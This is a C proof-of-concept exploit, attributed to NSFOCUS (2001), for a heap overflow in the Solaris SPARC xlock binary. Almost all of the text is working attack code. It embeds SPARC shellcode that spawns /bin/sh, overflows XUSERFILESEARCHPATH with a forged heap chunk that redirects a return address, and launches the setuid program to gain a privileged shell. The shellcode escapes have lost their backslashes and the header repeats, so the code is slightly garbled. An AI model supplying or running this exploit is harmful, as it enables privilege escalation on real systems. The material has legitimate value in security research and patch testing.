xlock Heap Overflow For Solaris SPARC

/*
* sol_sparc_xlockex.c - Proof of Concept Code for xlock heap overflow bug.
* Copyright (c) 2001 - Nsfocus.com
*
* Tested in Solaris 2.6/7/8 SPARC
* sol_sparc_xlockex.c - Proof of Concept Code for xlock heap overflow bug.
* Copyright (c) 2001 - Nsfocus.com
*
* Tested in Solaris 2.6/7/8 SPARC
*
* DISCLAIMS:
* This is a proof of concept code. This code is for test purpose
* only and should not be run against any host without permission from
* the system administrator.
*
* NSFOCUS Security Team <security@nsfocus.com>
* http://www.nsfocus.com
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/systeminfo.h>

#define RETLOC 0xffbee8c4 /* default "return address" location (Solaris 7) */
#define SP 0xffbefffc /* default "bottom" stack address (Solaris 7/8) */

#define VULPROG "/usr/openwin/bin/xlock"

#define NOP 0xaa1d4015 /* "xor %l5, %l5, %l5" */


char shellcode[] = /* from scz's shellcode for SPARC */
"x20xbfxffxffx20xbfxffxffx7fxffxffxffxaax1dx40x15"
"x81xc3xe0x14xaax1dx40x15xaax1dx40x15x90x08x3fxff"
"x82x10x20x8dx91xd0x20x08x90x08x3fxffx82x10x20x17"
"x91xd0x20x08x20x80x49x73x20x80x62x61x20x80x73x65"
"x20x80x3ax29x7fxffxffxffx94x1ax80x0ax90x03xe0x34"
"x92x0bx80x0ex9cx03xa0x08xd0x23xbfxf8xc0x23xbfxfc"
"xc0x2ax20x07x82x10x20x3bx91xd0x20x08x90x1bxc0x0f"
"x82x10x20x01x91xd0x20x08x2fx62x69x6ex2fx73x68xff";

/* get current stack point address */
long
get_sp(void)
{
__asm__("mov %sp,%i0");
}

long
get_shelladdr(long sp_addr, char **arg, char **env)
{
long retaddr;
int i;
char plat[256];
char pad = 0, pad1;
int env_len, arg_len, len;


/* calculate the length of "VULPROG" + argv[] */
for (i = 0, arg_len = 0; arg[i]!=NULL ; i++) {
arg_len += strlen(arg[i]) + 1;
}


/* calculate the pad nummber . */
pad = 3 - arg_len % 4;
printf("shellcode address padding = %d ", pad);

memset(env[0], 'A', pad);
env[0][pad] = '';

/* get environ length */
for (i = 0, env_len = 0; env[i]!=NULL; i++) {
env_len += strlen(env[i]) + 1;
}

/* get platform info */
sysinfo(SI_PLATFORM, plat, 256);

len = arg_len + env_len + strlen(plat) + 1 + strlen(VULPROG) + 1;
printf("stack arguments len = %#x(%d) ", len, len);

pad1 = len % 4;

if(pad1 == 3 ) pad1 = 5;
else pad1 = 4 - pad1;

printf("the padding zeros number = %d ", pad1);

/* get the exact shellcode address */
retaddr = sp_addr - pad1 /* the trailing zero number */
- strlen(VULPROG) - 1
- strlen(plat) - 1 ;

for(i--;i>0;i--) retaddr -= strlen(env[i]) + 1;

printf("Using RET address = 0x%x ", retaddr);
return retaddr;

} /* End of get_shelladdr */


int
main(int argc, char **argv)
{
char buf[2048], fake_chunk[48];
long retaddr, sp_addr = SP;
char *arg[24], *env[24];
char padding[64];
long retloc = RETLOC;
unsigned int *ptr;
char ev1[]="XUSERFILESEARCHPATH=";
long ev1_len;
long overbuflen = 1024;

if (argc > 1) /* you need adjust retloc offset in your system */
retloc += atoi(argv[1]);

arg[0] = VULPROG;
arg[1] = NULL;

bzero(buf, sizeof(buf));
ev1_len = strlen(ev1);
memcpy(buf, ev1, ev1_len);
memset(buf + ev1_len, 'A', overbuflen + sizeof(fake_chunk));

env[0] = padding; /* put padding buffer in env */
env[1] = shellcode; /* put shellcode in env */
env[2] = buf; /* put overflow environ */
env[3] = NULL; /* end of env */

/* get stack "bottom" address */
if(((unsigned char) (get_sp() >> 24)) == 0xef) { /* Solaris 2.6 */
sp_addr = SP - 0x0fbf0000;
retloc -= 0x0fbf0000;
}

retaddr = get_shelladdr(sp_addr, arg, env);
printf("Using retloc = 0x%x ", retloc);

memset(fake_chunk, 'xff', sizeof(fake_chunk));
ptr = (unsigned int *) fake_chunk;
*(ptr + 0) = 0xfffffff9;
*(ptr + 2) = retaddr - 8;
*(ptr + 8) = retloc - 8;

memcpy(buf + ev1_len + overbuflen, fake_chunk, sizeof(fake_chunk));

execve(VULPROG, arg, env);
perror("execle");
} /* End of main */